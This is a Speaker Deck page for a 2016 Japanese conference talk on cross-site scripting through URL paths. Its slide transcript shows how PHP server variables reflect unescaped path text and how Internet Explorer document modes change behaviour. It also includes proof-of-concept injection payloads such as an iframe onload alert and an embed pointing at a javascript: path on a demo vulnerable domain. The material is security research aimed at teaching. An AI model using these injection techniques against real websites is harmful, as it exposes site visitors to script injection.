Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up
for free
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Masato Kinugawa
March 29, 2016
Technology
14
21k
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Shibuya.XSS techtalk #7 の資料です。
Masato Kinugawa
March 29, 2016
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
masatokinugawa
21
5k
masatokinugawa
5
70k
masatokinugawa
9
11k
masatokinugawa
17
10k
masatokinugawa
35
17k
masatokinugawa
2
1.4k
masatokinugawa
20
20k
masatokinugawa
4
2.2k
masatokinugawa
7
2.2k
Other Decks in Technology
See All in Technology
tsuyo
0
480
recruitengineers
0
230
kenya888
1
110
chomado
0
280
kanaugust
PRO
0
200
line_developers
PRO
1
420
prog893
14
3.6k
ihcomega56
2
740
yuzoiwasaki
0
160
charity
9
11k
ishiayaya
PRO
0
810
finengine
0
310
Featured
See All Featured
swwweet
206
6.9k
destraynor
146
19k
brad_frost
157
6.5k
gr2m
83
11k
chriscoyier
146
20k
moore
125
21k
keithpitt
402
20k
addyosmani
1346
200k
kastner
54
2k
scottboms
252
11k
lara
16
2.9k
bkeepers
PRO
54
4.3k
Transcript
None
None
None
None
None
https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...
... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1
... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1
None
http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz
http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc
None
SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>
GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php
/test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E
http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
/test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1
/test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>
None
None
None
None
None
None
None
None
None
None
None
None
None
None
None
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta
http-equiv="X-UA-Compatible" content="IE=9"> </head>
<svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>
ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError
<meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe
src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf
<meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>
<script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>
None
None
None
None
None
None
None
None
None
None
None
None
None